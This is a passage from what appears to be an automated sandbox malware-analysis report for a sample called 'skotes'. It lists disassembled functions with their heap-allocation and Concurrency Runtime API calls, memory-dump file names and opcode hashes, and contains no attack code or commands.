RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004AA813,00000001,00000364,00000006,000000FF,?,0048D3FC,A02F68A0,?,00487A8B,?), ref: 004AD870

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 089d0d571400a98e841d0d8779496b8eec4d393f9f0453ba2b5bae1357d6c144
Instruction ID: 392a6dd2fa84db1492ebcb90e419adc8ab7475ef940ac0a7c7114287860a944c
Opcode Fuzzy Hash: 089d0d571400a98e841d0d8779496b8eec4d393f9f0453ba2b5bae1357d6c144
Instruction Fuzzy Hash: F0F0E972E4512466EB213A739C01A5B3759DF737B0B15802FEC2AA7A91DA2CEC0181E9

Function 004AB04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,A02F68A0,?,?,0048D3FC,A02F68A0,?,00487A8B,?,?,?,?,?,?,00477465,?), ref: 004AB07E

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 22c021f4f267000307f5c812a09074aceac853722fcc749ffeb4fd1fa9d0cd14
Instruction ID: 8dd756e164b166c9f43f02b99cbcd4d369be674e094baa0e1b518075ecfe1be9
Opcode Fuzzy Hash: 22c021f4f267000307f5c812a09074aceac853722fcc749ffeb4fd1fa9d0cd14
Instruction Fuzzy Hash: 4DE0E53114921196E63132764C00B9FB648CF633A0F050213ED6892292DB18DC4081ED

Function 05470B88 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ae7391d338de83247a6a769c392e7b216e77a10bb33cb4963829374954191f
Instruction ID: 44ad323801f998c9626192582c6530ad243e0acfba763c91056742813df12f29
Opcode Fuzzy Hash: 33ae7391d338de83247a6a769c392e7b216e77a10bb33cb4963829374954191f
Instruction Fuzzy Hash: 372138EB04F21DFD6146C5865A4D9F63BAFA696734330841BF40F9F202D285574B5D22

Function 05470BE8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e816e45d70c72a669241bd309e93bc128b4ef8cfce37166329c817026885d128
Instruction ID: 9ade3012768b269bec2616c848850a9ebb9a4ef6fbc9fdce4b9a73f709f14b13
Opcode Fuzzy Hash: e816e45d70c72a669241bd309e93bc128b4ef8cfce37166329c817026885d128
Instruction Fuzzy Hash: D51166EB04F22DFD2106C986164D9F63FABB6A37703308017F00F9B202D289134B5E22

Function 05470BAA Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a19cdfd73e09568875a394ab6c181e423b6b152ad2d50936adc8db466a4eb2d
Instruction ID: e2382a92fb66396e9da56d46ecda30ef776a0bd72badb6afac36200d4c13573f
Opcode Fuzzy Hash: 2a19cdfd73e09568875a394ab6c181e423b6b152ad2d50936adc8db466a4eb2d
Instruction Fuzzy Hash: 3D1100EB04F21DFD6206C986564DAF62FABB6967703308017F40F9B602D289534B5E22

Function 05470C10 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a985cda6152069736ba263828c1f4c5c73aa77065fc837f495eaf24dd920040
Instruction ID: 4e7073560dd2cef900cdbce5599794e0bfaee9b868924e54f67cefa3565c0f08
Opcode Fuzzy Hash: 3a985cda6152069736ba263828c1f4c5c73aa77065fc837f495eaf24dd920040
Instruction Fuzzy Hash: 880104EF04F20DFEA25AC986620D5F67FA7A6973303348427F00F9B701D295420B5E22

Function 05470C42 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 021e9ee8adfb46d5e2f88166e9af569b9fcffc4a9b552ca6acccd59bb3b83198
Instruction ID: 12ac71070380016186d776ec6e290fb465ceace6a35a65934a93c8aaefc507e1
Opcode Fuzzy Hash: 021e9ee8adfb46d5e2f88166e9af569b9fcffc4a9b552ca6acccd59bb3b83198
Instruction Fuzzy Hash: DBF0D1AE04F20DFE521ACA96521C6F66BBBB797230334840BF40F5F301C669124B6E22

Function 05470CE8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05251013e3277744f9f6aa76efa08acac070d9eea3fcbcaee1b52c7e6beaa8f
Instruction ID: d940645776f04acb0ac5e2cd04c405aa13c1e92b5a8209892357e7356977d91a
Opcode Fuzzy Hash: a05251013e3277744f9f6aa76efa08acac070d9eea3fcbcaee1b52c7e6beaa8f
Instruction Fuzzy Hash: B5F099AF00F308FC9211C984450C6F33F77BB07A303305443F04F4E202E249468A1DA1

Function 05470C58 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fe37ed7cd90fc62f4e125798d7c9902952e3c23172dc09dfeb64b1469fd120
Instruction ID: ec6e9519a9dcc6531efa1dbb25f87895454720f3647e86405f01dacb95312ffb
Opcode Fuzzy Hash: 91fe37ed7cd90fc62f4e125798d7c9902952e3c23172dc09dfeb64b1469fd120
Instruction Fuzzy Hash: 48F0F4BF04F209FD5216CA86560C6F17BABB757330330840BF00F5B701C265128A5E12

Function 05470C83 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9687033f3293178391edaa8a9ada596eec52b7c5fbe234bed0315278a1e1e3a9
Instruction ID: 8d0ed7409a6e684634bffdd271d21c94cb251966bc56734613a4b2f646068e5e
Opcode Fuzzy Hash: 9687033f3293178391edaa8a9ada596eec52b7c5fbe234bed0315278a1e1e3a9
Instruction Fuzzy Hash: B9F07DBF00F349EE8302C6A44A096F27F6B6B0B6707344557F44BDF142D355124A4A62

Function 05470C7A Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3711f93004e168b829e2572affa98e18fe750d9132f691ca3f924e935eef785
Instruction ID: bf4465f322e581767abde902dc075ee0ac1784d52ddf6fc056a8adc10eca0a40
Opcode Fuzzy Hash: c3711f93004e168b829e2572affa98e18fe750d9132f691ca3f924e935eef785
Instruction Fuzzy Hash: E2F0A0AF00F31DFD5196C98A560C5F16BAB67566703308507F40F9E601D389238A5E22

Function 05470CD8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5470000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5667f4d4ff97bbcef0f286d5e90a963552772be603ecc34e95a28ec59f76450a
Instruction ID: c852e4733cb28285ca1442760057d3e371a115d693a4bbefff7390f8952f6ec6
Opcode Fuzzy Hash: 5667f4d4ff97bbcef0f286d5e90a963552772be603ecc34e95a28ec59f76450a
Instruction Fuzzy Hash: 18E0C2BF00B30DFC5172D58A650C7F25E6B62966703758143B40FEA200D749335AA822

Non-executed Functions

Function 00490E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00490F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00490F62

Part of subcall function 0049265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00492750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00490FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00490FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0049103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0049106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004910C1

Strings

(, xrefs: 00490F22

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 491e522431c64987625a95a4516f8ff5ff1b81f49ec08934d99c907b29c9f2d6
Instruction ID: ea0b30e0a7c1e900fac2003bab6f0c78f076d1da6fe8b968692bbda93dcb967c
Opcode Fuzzy Hash: 491e522431c64987625a95a4516f8ff5ff1b81f49ec08934d99c907b29c9f2d6
Instruction Fuzzy Hash: BEB17A70A01616EFDF28CF58D981A7ABBB4FB48300F10416FE905AB795D734AD81CB98

Function 00491602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00492CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00492D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00491614

Part of subcall function 00492E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00492E39
Part of subcall function 00492E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00492EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00491746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004917A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004917B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004917ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0049180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0049181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00491823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0049183B

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
